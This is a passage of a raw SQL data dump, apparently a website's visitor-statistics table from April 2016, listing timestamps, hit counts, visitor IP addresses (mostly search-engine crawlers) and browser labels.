879777,1,1,0,0,'217.69.133.67','other'),(33455,1459879778,1,1,0,0,'94.179.104.142','firefox'),(33456,1459880216,3,0,3,0,'66.249.64.223',''),(33457,1459880252,1,0,1,0,'66.249.64.233',''),(33458,1459880460,1,1,0,0,'130.193.50.34','other'),(33459,1459880472,2,0,2,0,'66.249.64.228',''),(33460,1459880489,1,0,1,0,'157.55.39.121',''),(33461,1459880584,1,1,0,0,'217.69.133.225','other'),(33462,1459880837,1,1,0,0,'164.132.161.88','other'),(33463,1459881080,1,1,0,0,'217.69.133.223','other'),(33464,1459881567,1,1,0,0,'141.8.132.105','other'),(33465,1459881630,2,0,2,0,'66.249.64.106',''),(33466,1459881657,1,1,0,0,'164.132.161.82','other'),(33467,1459882094,1,0,1,0,'66.249.64.90',''),(33468,1459882107,1,0,1,0,'66.249.64.228',''),(33469,1459882275,2,0,2,0,'66.249.64.223',''),(33470,1459882376,1,0,1,0,'66.249.64.96',''),(33471,1459882564,1,0,1,0,'66.249.64.233',''),(33472,1459882791,1,1,0,0,'141.8.132.105','other'),(33473,1459882817,1,1,0,0,'94.179.113.57','firefox'),(33474,1459882920,1,1,0,0,'62.210.215.100','chrome'),(33475,1459883116,1,1,0,0,'217.69.133.235','other'),(33476,1459883566,1,1,0,0,'109.173.125.227','chrome'),(33477,1459883670,1,1,0,0,'164.132.161.19','other'),(33478,1459884058,3,3,0,0,'130.193.50.34','other'),(33479,1459884405,1,0,1,0,'66.249.64.233',''),(33480,1459884728,1,1,0,0,'51.255.65.88','other'),(33481,1459884840,1,1,0,0,'217.69.133.217','other'),(33482,1459884864,1,1,0,0,'51.255.65.53','other'),(33483,1459884967,1,1,0,0,'141.8.132.105','other'),(33484,1459885191,1,0,1,0,'66.249.64.162',''),(33485,1459885415,2,0,2,0,'66.249.64.106',''),(33486,1459885448,1,1,0,0,'82.145.209.55','opera'),(33487,1459885503,5,0,5,0,'66.249.64.96',''),(33488,1459885614,1,1,0,0,'164.132.161.7','other'),(33489,1459885638,1,0,1,0,'66.249.64.233',''),(33490,1459885650,4,0,4,0,'66.249.64.223',''),(33491,1459885657,1,0,1,0,'66.249.64.80',''),(33492,1459885697,1,0,1,0,'66.249.64.228',''),(33493,1459885751,1,1,0,0,'217.69.133.230','other'),(33494,1459886228,1,1,0,0,'130.193.50.34','other'),(33495,1459886421,1,0,1,0,'66.249.64.150',''),(33496,1459886623,1,1,0,0,'217.69.133.226','other'),(33497,1459887274,3,3,0,0,'130.193.50.34','other'),(33498,1459887308,1,0,1,0,'66.249.64.228',''),(33499,1459887385,1,1,0,0,'31.184.238.235','firefox'),(33500,1459887415,2,0,2,0,'66.249.64.101',''),(33501,1459887510,1,0,1,0,'66.249.64.150',''),(33502,1459887656,1,0,1,0,'68.180.231.29',''),(33503,1459887698,1,1,0,0,'51.255.65.97','other'),(33504,1459887993,1,0,1,0,'66.249.64.233',''),(33505,1459888200,1,1,0,0,'5.255.253.113','other'),(33506,1459888232,2,2,0,0,'130.193.50.34','other'),(33507,1459888484,1,1,0,0,'144.76.93.46','other'),(33508,1459888616,1,1,0,0,'82.145.217.105','opera'),(33509,1459888891,1,1,0,0,'66.249.89.114','other'),(33510,1459888911,1,1,0,0,'217.69.133.221','other'),(33511,1459888917,1,1,0,0,'217.69.133.233','other'),(33512,1459889007,4,0,4,0,'66.249.64.223',''),(33513,1459889020,2,0,2,0,'66.249.64.228',''),(33514,1459889228,1,1,0,0,'217.69.133.238','other'),(33516,1459889618,1,1,0,0,'8.29.198.26','other'),(33517,1459889695,1,1,0,0,'164.132.161.85','other'),(33518,1459890316,1,0,1,0,'66.249.64.228',''),(33519,1459890322,5,0,5,0,'66.249.64.223',''),(33520,1459890503,1,1,0,0,'130.193.50.34','other'),(33521,1459890620,1,1,0,0,'217.69.133.216','other'),(33522,1459890655,1,1,0,0,'141.8.132.105','other'),(33523,1459890896,1,0,1,0,'68.180.231.29',''),(33524,1459891110,1,1,0,0,'217.69.133.253','other'),(33525,1459891281,3,0,3,0,'66.249.64.96',''),(33526,1459891319,1,1,0,0,'82.145.217.105','opera'),(33527,1459891991,1,0,1,0,'66.249.64.228',''),(33528,1459892045,1,1,0,0,'217.69.133.218','other'),(33529,1459892056,1,0,1,0,'66.249.64.233',''),(33530,1459892130,1,0,1,0,'66.249.64.223',''),(33531,1459892136,1,1,0,0,'217.69.133.220','other'),(33532,1459892436,1,1,0,0,'51.255.65.31','other'),(33533,1459892464,1,1,0,0,'141.8.132.105','other'),(33534,1459892506,1,1,0,0,'217.69.136.207','other'),(33535,1459892666,1,1,0,0,'130.193.50.34','other'),(33536,1459892692,2,2,0,0,'164.132.161.46','other'),(33537,1459892843,1,1,0,0,'5.255.253.113','other'),(33538,1459893181,2,0,2,0,'66.249.64.233',''),(33539,1459893275,1,1,0,0,'217.69.133.231','other'),(33540,1459893366,1,1,0,0,'164.132.161.95','other'),(33541,1459893631,1,0,1,0,'68.180.231.29',''),(33542,1459893694,1,1,0,0,'157.55.39.185','other'),(33543,1459893724,1,0,1,0,'66.249.64.150',''),(33544,1459893795,1,1,0,0,'5.255.253.113','other'),(33545,1459894386,1,1,0,0,'130.193.50.34','other'),(33546,1459894756,1,0,1,0,'66.249.64.228',''),(33547,1459895104,3,0,3,0,'68.180.231.29',''),(33548,1459895105,1,0,1,0,'66.249.64.223',''),(33549,1459895391,1,1,0,0,'130.193.50.34','other'),(33550,1459895904,1,1,0,0,'217.69.133.236','other'),(33551,1459896090,1,0,1,0,'66.249.64.223',''),(33552,1459896226,1,1,0,0,'62.210.215.100','chrome'),(33553,1459896579,1,1,0,0,'217.69.133.216','other'),(33554,1459896711,1,1,0,0,'217.69.133.85','other'),(33555,1459896873,1,1,0,0,'130.193.50.34','other'),(33556,1459897147,1,0,1,0,'66.249.64.228',''),(33557,1459897185,1,1,0,0,'82.145.209.188','opera'),(33559,1459897214,2,0,2,0,'66.249.64.223',''),(33560,1459897255,1,1,0,0,'207.46.13.139','other'),(33561,1459897523,2,0,2,0,'66.249.64.106',''),(33562,1459897620,1,1,0,0,'141.8.132.105','other'),(33563,1459897709,1,0,1,0,'66.249.64.96',''),(33564,1459897797,1,1,0,0,'217.69.133.240','other'),(33565,1459897920,2,0,2,0,'66.249.64.101',''),(33566,1459898093,1,0,1,0,'66.249.64.228',''),(33567,1459898321,2,2,0,0,'130.193.50.34','other'),(33568,1459898600,1,1,0,0,'217.69.133.224','other'),(33569,1459898762,1,1,0,0,'217.69.133.231','other'),(33570,1459898936,1,0,1,0,'66.249.64.156',''),(33571,1459899521,1,1,0,0,'164.132.161.30','other'),(33572,1459899522,1,1,0,0,'66.249.89.114','other'),(33573,1459899684,3,3,0,0,'141.8.183.25','other'),(33574,1459899687,23,23,0,0,'130.193.50.34','other'),(33575,1459899844,1,1,0,0,'217.69.133.232','other'),(33576,1459899852,8,8,0,0,'141.8.132.105','other'),(33577,1459899943,2,0,2,0,'66.249.64.228',''),(33578,1459899956,1,0,1,0,'66.249.64.223',''),(33579,1459900019,1,1,0,0,'51.255.65.55','other'),(33580,1459900513,1,0,1,0,'68.180.231.29',''),(33581,1459900525,1,1,0,0,'8.29.198.26','other'),(33582,1459900613,8,8,0,0,'130.193.50.34','other'),(33583,1459900670,1,1,0,0,'178.154.189.37','other'),(33584,1459900687,1,1,0,0,'217.69.133.12','other'),(33585,1459900689,1,1,0,0,'217.69.133.14','other'),(33586,1459900771,1,1,0,0,'40.77.167.1','other'),(33587,1459900875,1,1,0,0,'178.154.189.31','other'),(33588,1459900887,4,4,0,0,'141.8.132.105','other'),(33589,1459901140,1,1,0,0,'178.154.149.10','other'),(33590,1459901309,1,1,0,0,'66.249.64.223','other'),(33591,1459901457,1,1,0,0,'217.69.133.237','other'),(33592,1459901633,17,17,0,0,'130.193.50.34','other'),(33593,1459901843,7,7,0,0,'141.8.132.105','other'),(33594,1459901864,1,1,0,0,'164.132.161.35','other'),(33595,1459901960,2,2,0,0,'5.255.253.113','other'),(33596,1459902422,1,1,0,0,'141.8.132.10','other'),(33597,1459902423,1,1,0,0,'66.249.64.162','other'),(33598,1459902426,3,3,0,0,'141.8.142.25','other'),(33599,1459902430,1,1,0,0,'93.158.152.9','other'),(33600,1459902434,1,1,0,0,'130.193.51.79','other'),(33601,1459902494,1,1,0,0,'130.193.50.38','other'),(33602,1459902562,3,3,0,0,'130.193.50.34','other'),(33603,1459902646,1,0,1,0,'68.180.231.29',''),(33604,1459902724,1,1,0,0,'141.8.183.25','other'),(33605,1459902815,1,1,0,0,'141.8.142.58','other'),(33606,1459902828,3,0,3,0,'66.249.64.223',''),(33607,1459902915,1,1,0,0,'141.8.132.41','other'),(33608,1459903142,6,6,0,0,'141.8.132.105','other'),(33609,1459903317,1,1,0,0,'217.69.133.68','other'),(33610,1459903392,1,1,0,0,'178.154.189.37','other'),(33611,1459903437,1,1,0,0,'178.154.189.31','other'),(33612,1459903518,6,6,0,0,'130.193.50.34','other'),(33613,1459903825,1,0,1,0,'68.180.231.29',''),(33614,1459904122,1,1,0,0,'217.69.133.238','other'),(33615,1459904123,1,1,0,0,'217.69.133.70','other'),(33616,1459904143,3,3,0,0,'141.8.132.105','other'),(33617,1459904269,1,1,0,0,'141.8.183.25','other'),(33618,1459904440,1,0,1,0,'66.249.64.233',''),(33619,1459904548,1,1,0,0,'51.255.65.35','other'),(33620,1459904616,1,1,0,0,'217.69.133.228','other'),(33621,1459904659,1,1,0,0,'130.193.51.79','other'),(33622,1459904664,1,1,0,0,'130.193.50.32','other'),(33623,1459904733,1,1,0,0,'217.69.133.15','other'),(33624,1459904972,1,1,0,0,'217.69.133.220','other'),(33625,1459905308,1,1,0,0,'217.69.133.13','other'),(33626,1459905501,2,1,1,0,'66.249.64.228',''),(33627,1459905697,3,0,3,0,'66.249.64.223',''),(33628,1459905724,1,1,0,0,'217.69.133.234','other'),(33629,1459906623,1,1,0,0,'141.8.183.25','other'),(33630,1459906790,1,0,1,0,'66.249.64.233',''),(33631,1459906860,3,0,3,0,'66.249.64.228',''),(33632,1459907059,1,1,0,0,'217.69.133.10','other'),(33633,1459907061,1,1,0,0,'217.69.133.14','other'),(33634,1459907527,1,1,0,0,'141.8.132.105','other'),(33635,1459907555,3,0,3,0,'66.249.64.223',''),(33636,1459907602,1,1,0,0,'157.55.39.101','other'),(33637,1459908045,1,0,1,0,'66.249.64.228',''),(33638,1459908204,1,0,1,0,'66.249.64.156',''),(33639,1459908451,1,0,1,0,'66.249.64.233',''),(33640,1459909044,3,0,3,0,'66.249.64.223',''),(33641,1459909066,1,1,0,0,'93.158.152.40','other'),(33642,1459909074,1,1,0,0,'217.69.133.222','other'),(33643,1459909212,2,0,2,0,'68.180.231.29',''),(33644,1459909303,1,0,1,0,'66.249.64.150',''),(33645,1459909341,2,2,0,0,'217.69.133.234','other'),(33647,1459909435,1,0,1,0,'66.249.64.228',''),(33648,1459909553,3,3,0,0,'141.8.132.105','other'),(33649,1459909605,1,0,1,0,'66.249.64.144',''),(33650,1459909650,1,1,0,0,'141.8.132.101','other'),(33651,1459909741,1,0,1,0,'66.249.64.138',''),(33652,1459909942,1,1,0,0,'66.249.89.70','other'),(33653,1459910045,1,1,0,0,'151.80.31.156','other'),(33654,1459910215,2,2,0,0,'62.210.215.100','chrome'),(33655,1459910312,1,1,0,0,'217.69.133.229','other'),(33656,1459910336,1,1,0,0,'130.193.50.34','other'),(33657,1459910441,1,1,0,0,'178.255.215.95','other'),(33658,1459910444,1,0,1,0,'68.180.231.29',''),(33659,1459911112,1,1,0,0,'66.249.64.223','other'),(33660,1459911113,1,1,0,0,'217.69.133.231','other'),(33661,1459911326,1,1,0,0,'130.193.50.34','other'),(33662,1459911370,1,1,0,0,'8.29.198.25','other'),(33663,1459911559,3,3,0,0,'141.8.183.25','other'),(33664,1459911598,4,4,0,0,'141.8.132.105','other'),(33665,1459912121,1,1,0,0,'217.69.133.237','other'),(33666,1459912251,1,1,0,0,'51.255.65.86','other'),(33667,1459912351,7,7,0,0,'130.193.50.34','other'),(33668,1459912353,1,0,1,0,'68.180.231.29',''),(33669,1459912533,1,1,0,0,'164.132.161.85','other'),(33670,1459912717,1,1,0,0,'66.102.9.86','chrome'),(33671,1459912762,1,1,0,0,'5.255.253.113','other'),(33672,1459912824,1,1,0,0,'46.211.156.75','chrome'),(33673,1459913014,1,1,0,0,'217.69.133.220','other'),(33674,1459913083,2,2,0,0,'141.8.132.105','other'),(33675,1459913372,1,1,0,0,'46.211.154.28','chrome'),(33676,1459913384,1,0,1,0,'66.249.64.96',''),(33677,1459914030,1,1,0,0,'5.255.253.113','other'),(33678,1459914034,1,1,0,0,'130.193.50.34','other'),(33679,1459914236,1,1,0,0,'89.163.132.131','other'),(33680,1459914318,2,0,2,0,'66.249.64.223',''),(33681,1459914323,2,0,2,0,'66.249.64.228',''),(33682,1459914750,1,1,0,0,'217.69.133.67','other'),(33683,1459914874,1,0,1,0,'66.249.64.233',''),(33684,1459915017,1,1,0,0,'217.69.133.227','other'),(33685,1459915081,3,3,0,0,'130.193.50.34','other'),(33686,1459915184,1,1,0,0,'141.8.183.25','other'),(33687,1459915287,1,1,0,0,'5.255.253.113','other'),(33688,1459915352,1,1,0,0,'217.69.133.226','other'),(33689,1459915526,1,1,0,0,'217.69.133.224','other'),(33690,1459915560,1,1,0,0,'141.8.142.58','other'),(33691,1459915873,1,1,0,0,'217.69.133.232','other'),(33692,1459916064,1,0,1,0,'66.249.64.233',''),(33693,1459916096,2,0,2,0,'66.249.64.223',''),(33694,1459916493,1,1,0,0,'51.255.65.16','other'),(33695,1459916549,1,1,0,0,'130.193.50.34','other'),(33696,1459916570,1,1,0,0,'217.69.133.69','other'),(33697,1459916571,1,1,0,0,'217.69.133.233','other'),(33698,1459916664,2,0,2,0,'66.249.64.228',''),(33699,1459917084,1,1,0,0,'51.255.65.22','other'),(33700,1459917251,1,1,0,0,'94.179.48.70','firefox'),(33701,1459917562,1,1,0,0,'141.8.183.25','other'),(33702,1459917707,1,0,1,0,'66.249.64.223',''),(33703,1459918070,1,1,0,0,'141.8.142.58','other'),(33704,1459918222,1,0,1,0,'66.249.64.233',''),(33705,1459918301,1,1,0,0,'151.80.31.173','other'),(33706,1459918357,1,0,1,0,'66.249.64.228',''),(33707,1459918844,1,1,0,0,'141.8.132.105','other'),(33708,1459918861,1,1,0,0,'130.193.51.19','other'),(33709,1459918903,1,1,0,0,'130.193.50.4','other'),(33710,1459918951,2,2,0,0,'130.193.51.74','other'),(33711,1459918994,1,1,0,0,'141.8.132.30','other'),(33712,1459919089,3,0,3,0,'66.249.64.223',''),(33713,1459919225,1,1,0,0,'141.8.142.78','other'),(33714,1459919235,2,0,2,0,'66.249.64.233',''),(33715,1459919360,1,1,0,0,'141.8.132.52','other'),(33716,1459919382,1,1,0,0,'178.154.149.11','other'),(33717,1459919468,2,2,0,0,'130.193.51.45','other'),(33718,1459919540,2,2,0,0,'93.158.152.9','other'),(33719,1459919764,2,0,2,0,'66.249.64.228',''),(33720,1459920038,1,1,0,0,'130.193.51.43','other'),(33721,1459920081,1,1,0,0,'217.69.133.230','other'),(33722,1459920130,3,0,3,0,'68.180.231.29',''),(33723,1459920180,1,1,0,0,'217.69.133.5','other'),(33724,1459920181,1,1,0,0,'217.69.133.9','other'),(33725,1459920183,1,0,1,0,'66.249.64.162',''),(33726,1459920243,1,1,0,0,'141.8.142.78','other'),(33727,1459920321,1,1,0,0,'66.249.89.116','other'),(33728,1459920553,2,2,0,0,'5.255.253.113','other'),(33729,1459920557,1,1,0,0,'141.8.132.105','other'),(33730,1459920561,1,1,0,0,'130.193.51.19','other'),(33731,1459920565,1,1,0,0,'178.154.149.10','other'),(33732,1459920744,1,1,0,0,'51.255.65.75','other'),(33733,1459920766,1,1,0,0,'217.69.133.233','other'),(33734,1459920767,1,1,0,0,'217.69.133.69','other'),(33735,1459921005,3,0,3,0,'66.249.64.233',''),(33736,1459921115,1,0,1,0,'66.249.64.162',''),(33737,1459921264,1,1,0,0,'164.132.161.94','other'),(33738,1459921550,4,0,4,0,'66.249.64.228',''),(33739,1459921586,1,1,0,0,'130.193.50.32','other'),(33740,1459921590,1,1,0,0,'130.193.51.19','other'),(33741,1459921690,1,0,1,0,'66.249.64.150',''),(33742,1459921708,1,0,1,0,'66.249.64.223',''),(33743,1459921830,3,3,0,0,'141.8.132.105','other'),(33744,1459921982,2,0,2,0,'66.249.64.233',''),(33745,1459922195,1,1,0,0,'8.29.198.26','other'),(33746,1459922221,1,1,0,0,'92.113.35.185','chrome'),(33747,1459922260,1,1,0,0,'157.55.39.185','other'),(33748,1459922264,1,1,0,0,'217.69.133.226','other'),(33749,1459922456,2,0,2,0,'66.249.64.228',''),(33750,1459923082,2,2,0,0,'130.193.50.34','other'),(33751,1459923230,1,1,0,0,'141.0.14.32','opera'),(33752,1459923276,1,1,0,0,'164.132.161.49','other'),(33753,1459923385,1,0,1,0,'66.249.64.223',''),(33754,1459923409,1,0,1,0,'68.180.231.29',''),(33755,1459923449,5,5,0,0,'195.154.187.115','other'),(33756,1459923623,1,0,1,0,'66.249.64.233',''),(33757,1459923779,1,1,0,0,'130.193.51.83','other'),(33758,1459923843,1,1,0,0,'91.196.178.37','chrome'),(33759,1459923878,1,1,0,0,'141.8.183.25','other'),(33760,1459923931,1,1,0,0,'91.196.178.131','chrome'),(33761,1459923997,1,1,0,0,'93.158.152.75','other'),(33762,1459924143,2,2,0,0,'5.255.253.47','other'),(33763,1459924361,1,1,0,0,'217.69.133.215','other'),(33764,1459924746,1,1,0,0,'5.255.253.36','other'),(33765,1459924750,1,1,0,0,'178.154.189.37','other'),(33766,1459925080,1,1,0,0,'91.196.178.70','chrome'),(33767,1459925102,1,0,1,0,'66.249.64.233',''),(33768,1459925242,2,0,2,0,'66.249.64.228',''),(33769,1459925318,1,1,0,0,'144.76.29.162','other'),(33770,1459925321,2,0,2,0,'66.249.64.162',''),(33771,1459925483,1,1,0,0,'62.210.215.100','chrome'),(33772,1459925533,1,1,0,0,'51.255.65.51','other'),(33773,1459926059,1,1,0,0,'66.249.64.228','other'),(33774,1459926701,1,1,0,0,'217.69.133.69','other'),(33775,1459926846,2,2,0,0,'93.158.152.75','other'),(33776,1459927238,2,0,2,0,'66.249.64.228',''),(33777,1459927273,1,1,0,0,'180.76.15.8','other'),(33778,1459927533,1,1,0,0,'5.255.253.36','other'),(33779,1459927591,2,0,2,0,'68.180.231.29',''),(33780,1459927779,1,1,0,0,'141.8.183.14','other'),(33781,1459927784,1,1,0,0,'141.8.142.85','other'),(33782,1459928058,1,1,0,0,'217.69.133.225','other'),(33783,1459928100,2,0,2,0,'66.249.64.223',''),(33784,1459928112,1,1,0,0,'91.196.178.70','firefox'),(33785,1459928170,1,1,0,0,'217.69.133.231','other'),(33786,1459928188,1,0,1,0,'66.249.64.228',''),(33787,1459928269,1,1,0,0,'130.193.51.83','other'),(33788,1459928284,1,1,0,0,'51.255.65.34','other'),(33789,1459928737,1,1,0,0,'51.255.65.79','other'),(33790,1459928752,1,1,0,0,'85.115.62.180','other'),(33791,1459929136,1,1,0,0,'141.8.183.25','other'),(33792,1459929217,1,0,1,0,'66.249.64.228',''),(33793,1459929484,1,1,0,0,'77.247.181.162','chrome'),(33794,1459929540,1,1,0,0,'180.76.15.159','other'),(33795,1459929613,1,1,0,0,'180.76.15.157','other'),(33796,1459929776,1,1,0,0,'37.52.95.196','opera'),(33797,1459929993,1,1,0,0,'91.201.240.211','chrome'),(33798,1459930196,1,1,0,0,'91.196.178.69','firefox'),(33799,1459930301,1,0,1,0,'66.249.64.156',''),(33800,1459930728,1,1,0,0,'217.69.133.225','other'),(33801,1459930729,1,1,0,0,'217.69.133.222','other'),(33802,1459930747,1,1,0,0,'85.222.44.46','chrome'),(33803,1459931013,1,1,0,0,'217.69.133.228','other'),(33804,1459931247,1,1,0,0,'141.8.132.52','other'),(33805,1459931284,2,0,2,0,'66.249.64.233',''),(33806,1459931356,2,2,0,0,'130.193.51.19','other'),(33807,1459931393,1,1,0,0,'180.76.15.147','other'),(33808,1459931412,1,1,0,0,'66.249.89.116','other'),(33809,1459931462,4,0,4,0,'66.249.64.223',''),(33810,1459931494,1,1,0,0,'31.41.48.36','chrome'),(33811,1459931581,1,1,0,0,'91.196.178.70','firefox'),(33812,1459931601,3,3,0,0,'130.193.50.34','other'),(33813,1459931786,1,0,1,0,'66.249.64.162',''),(33814,1459931851,1,1,0,0,'130.193.51.83','other'),(33815,1459931855,2,2,0,0,'5.255.253.113','other'),(33816,1459931929,1,0,1,0,'66.249.64.150',''),(33817,1459931935,3,0,3,0,'66.249.64.228',''),(33818,1459931976,6,6,0,0,'141.8.183.25','other'),(33819,1459932399,1,1,0,0,'217.69.133.229','other'),(33820,1459932468,1,1,0,0,'217.69.133.222','other'),(33821,1459932539,3,3,0,0,'141.8.132.105','other'),(33822,1459932614,5,1,4,0,'66.249.64.228',''),(33823,1459932624,1,1,0,0,'51.255.65.54','other'),(33824,1459932675,1,1,0,0,'91.196.178.70','firefox'),(33825,1459932762,1,1,0,0,'217.69.133.221','other'),(33826,1459932763,1,1,0,0,'217.69.133.68','other'),(33827,1459932790,2,0,2,0,'66.249.64.223',''),(33828,1459932824,1,1,0,0,'130.193.50.34','other'),(33829,1459932949,2,2,0,0,'141.8.183.25','other'),(33830,1459933092,1,1,0,0,'8.29.198.26','other'),(33831,1459933141,1,1,0,0,'217.69.133.227','other'),(33832,1459933324,1,1,0,0,'130.193.51.83','other'),(33833,1459933450,1,1,0,0,'5.255.253.113','other'),(33834,1459933775,1,1,0,0,'213.179.252.251','chrome'),(33835,1459934420,4,0,4,0,'66.249.64.223',''),(33836,1459934485,2,0,2,0,'66.249.64.233',''),(33837,1459934511,1,0,1,0,'66.249.64.228',''),(33838,1459934560,1,1,0,0,'91.196.178.72','chrome'),(33839,1459934700,1,1,0,0,'217.69.133.13','other'),(33840,1459935048,1,1,0,0,'141.8.132.105','other'),(33841,1459935197,1,1,0,0,'5.255.253.47','other'),(33842,1459935641,3,0,3,0,'66.249.64.233',''),(33843,1459935654,1,1,0,0,'95.135.19.126','chrome'),(33844,1459935845,1,1,0,0,'217.69.133.85','other'),(33845,1459935932,1,1,0,0,'94.179.113.102','firefox'),(33846,1459935934,1,1,0,0,'95.132.56.52','chrome'),(33847,1459936105,1,0,1,0,'66.249.64.150',''),(33848,1459936181,1,0,1,0,'66.249.64.223',''),(33849,1459936394,1,1,0,0,'157.55.39.185','other'),(33850,1459936558,1,1,0,0,'217.69.133.216','other'),(33851,1459936659,1,1,0,0,'82.145.208.43','opera'),(33853,1459936714,1,1,0,0,'217.69.133.203','other'),(33854,1459936844,1,1,0,0,'164.132.161.59','other'),(33855,1459936944,1,1,0,0,'51.255.65.39','other'),(33856,1459937013,1,1,0,0,'91.196.178.70','other'),(33857,1459937050,1,1,0,0,'180.76.15.10','other'),(33858,1459937125,1,1,0,0,'151.80.31.183','other'),(33859,1459937558,1,1,0,0,'217.69.133.233','other'),(33860,1459937610,2,2,0,0,'94.179.98.250','chrome'),(33861,1459937742,2,2,0,0,'130.193.50.34','other'),(33862,1459937746,3,3,0,0,'141.8.132.105','other'),(33863,1459938042,3,0,3,0,'66.249.64.223',''),(33864,1459938069,5,0,5,0,'66.249.64.228',''),(33865,1459938247,184,184,0,0,'5.9.89.170','other'),(33866,1459938270,1,1,0,0,'130.193.51.83','other'),(33867,1459938346,1,1,0,0,'217.69.133.220','other'),(33868,1459938648,1,1,0,0,'66.102.9.57','chrome'),(33869,1459939071,1,0,1,0,'66.249.64.228',''),(33870,1459939284,1,0,1,0,'66.249.64.150',''),(33871,1459939329,1,1,0,0,'217.69.133.69','other'),(33872,1459939456,2,2,0,0,'217.69.133.227','other'),(33873,1459939457,1,1,0,0,'217.69.133.228','other'),(33874,1459939576,1,0,1,0,'66.249.64.233',''),(33875,1459939689,1,1,0,0,'217.69.133.234','other'),(33876,1459940109,1,1,0,0,'95.134.116.124','chrome'),(33877,1459940140,2,0,2,0,'66.249.64.228',''),(33878,1459940357,4,0,4,0,'66.249.64.223',''),(33879,1459940486,1,1,0,0,'91.196.178.70','chrome'),(33880,1459940942,1,1,0,0,'217.69.133.15','other'),(33881,1459941063,1,1,0,0,'151.80.31.164','other'),(33882,1459941392,1,1,0,0,'178.95.232.180','chrome'),(33883,1459941451,1,1,0,0,'217.69.133.18','other'),(33884,1459941452,1,1,0,0,'217.69.133.12','other'),(33885,1459941494,1,1,0,0,'93.158.152.51','other'),(33886,1459941511,1,1,0,0,'40.77.167.1','other'),(33887,1459941811,1,1,0,0,'51.255.65.3','other'),(33888,1459941910,1,1,0,0,'91.196.178.70','firefox'),(33889,1459942025,1,0,1,0,'66.249.64.228',''),(33890,1459942035,1,0,1,0,'66.249.64.223',''),(33891,1459942051,1,1,0,0,'66.249.89.114','other'),(33892,1459942258,2,0,2,0,'66.249.64.162',''),(33893,1459942271,1,1,0,0,'5.255.253.113','other'),(33894,1459942350,1,1,0,0,'217.69.133.225','other'),(33895,1459942351,1,1,0,0,'217.69.133.68','other'),(33896,1459942391,1,1,0,0,'217.69.133.240','other'),(33897,1459942392,1,1,0,0,'217.69.133.238','other'),(33898,1459942645,3,1,2,0,'66.249.64.233',''),(33899,1459942864,1,1,0,0,'62.210.215.100','chrome'),(33900,1459942984,1,1,0,0,'217.69.133.217','other'),(33901,1459943027,2,0,2,0,'66.249.64.228',''),(33902,1459943110,4,0,4,0,'66.249.64.223',''),(33903,1459943293,1,1,0,0,'94.178.105.86','firefox'),(33904,1459943323,2,1,1,0,'66.249.64.223',''),(33905,1459943782,1,1,0,0,'130.180.216.46','chrome'),(33906,1459943899,1,1,0,0,'40.77.167.1','other'),(33907,1459943924,1,1,0,0,'8.29.198.25','other'),(33908,1459944054,1,1,0,0,'141.8.132.105','other'),(33909,1459944179,1,1,0,0,'217.69.133.67','other'),(33910,1459944254,1,1,0,0,'130.193.51.19','other'),(33911,1459944431,1,1,0,0,'5.255.253.113','other'),(33912,1459944488,1,1,0,0,'141.0.15.94','opera'),(33913,1459944523,1,1,0,0,'91.197.146.244','chrome'),(33914,1459944536,1,1,0,0,'91.196.178.67','firefox'),(33915,1459944668,1,1,0,0,'151.80.31.162','other'),(33916,1459944789,2,0,2,0,'66.249.64.233',''),(33917,1459944800,1,0,1,0,'66.249.64.156',''),(33918,1459944875,1,1,0,0,'217.69.133.238','other'),(33919,1459944931,4,0,4,0,'66.249.64.228',''),(33920,1459944946,10,0,10,0,'66.249.64.223',''),(33921,1459944974,1,1,0,0,'217.69.133.224','other'),(33922,1459945350,1,1,0,0,'217.69.133.229','other'),(33923,1459945746,1,1,0,0,'178.95.104.190','chrome'),(33924,1459946205,3,0,3,0,'66.249.64.233',''),(33925,1459946241,1,1,0,0,'151.80.31.160','other'),(33926,1459946374,1,0,1,0,'66.249.64.150',''),(33927,1459946667,1,1,0,0,'141.0.15.94','opera'),(33928,1459946922,3,0,3,0,'66.249.64.228',''),(33929,1459946944,300,300,0,0,'138.201.30.91','other'),(33930,1459946945,1,1,0,0,'5.255.253.113','other'),(33931,1459946969,3,0,3,0,'66.249.64.223',''),(33932,1459947017,1,0,1,0,'66.249.64.156',''),(33933,1459947066,1,1,0,0,'141.8.183.25','other'),(33934,1459947222,1,1,0,0,'217.69.133.4','other'),(33935,1459947340,1,1,0,0,'217.69.133.67','other'),(33936,1459947379,1,1,0,0,'95.134.34.127','chrome'),(33937,1459947510,2,1,1,0,'66.249.64.223',''),(33938,1459947555,1,1,0,0,'217.69.133.68','other'),(33939,1459948175,1,0,1,0,'68.180.231.29',''),(33940,1459948577,1,1,0,0,'217.69.133.225','other'),(33941,1459948611,1,1,0,0,'51.255.65.94','other'),(33942,1459948838,1,1,0,0,'217.69.133.219','other'),(33943,1459948882,2,0,2,0,'66.249.64.156',''),(33944,1459948900,1,0,1,0,'66.249.64.228',''),(33945,1459948906,5,0,5,0,'66.249.64.223',''),(33946,1459949099,1,1,0,0,'217.69.133.234','other'),(33947,1459949199,1,1,0,0,'66.249.93.225','chrome'),(33948,1459949658,1,1,0,0,'217.69.133.215','other'),(33949,1459949726,1,1,0,0,'95.135.213.29','firefox'),(33950,1459949826,1,0,1,0,'68.180.231.29',''),(33951,1459950646,1,1,0,0,'164.132.161.8','other'),(33952,1459950686,2,2,0,0,'217.69.133.229','other'),(33953,1459950844,1,1,0,0,'217.69.133.14','other'),(33954,1459950973,1,0,1,0,'66.249.64.150',''),(33955,1459950989,3,0,3,0,'66.249.64.233',''),(33956,1459951028,2,0,2,0,'66.249.64.223',''),(33957,1459951240,1,1,0,0,'141.8.132.105','other'),(33958,1459951293,1,1,0,0,'51.255.65.55','other'),(33959,1459951356,2,2,0,0,'217.69.133.194','other'),(33960,1459951408,1,1,0,0,'130.193.50.34','other'),(33961,1459951514,1,1,0,0,'91.196.178.71','chrome'),(33962,1459951544,1,1,0,0,'180.76.15.145','other'),(33963,1459951549,1,1,0,0,'141.8.142.67','other'),(33964,1459952037,3,0,3,0,'66.249.64.223',''),(33965,1459952050,1,0,1,0,'66.249.64.233',''),(33966,1459952098,3,0,3,0,'66.249.64.228',''),(33967,1459952537,1,1,0,0,'91.124.43.100','chrome'),(33968,1459952636,4,4,0,0,'46.165.197.141','other'),(33969,1459952728,1,1,0,0,'164.132.161.18','other'),(33970,1459952901,1,1,0,0,'66.249.89.116','other'),(33971,1459952965,1,1,0,0,'5.255.253.68','other'),(33972,1459953398,1,0,1,0,'66.249.64.156',''),(33973,1459953493,1,0,1,0,'68.180.231.29',''),(33974,1459953620,3,1,2,0,'66.249.64.228',''),(33975,1459953977,4,0,4,0,'66.249.64.223',''),(33976,1459953979,1,0,1,0,'66.249.64.233',''),(33977,1459954361,1,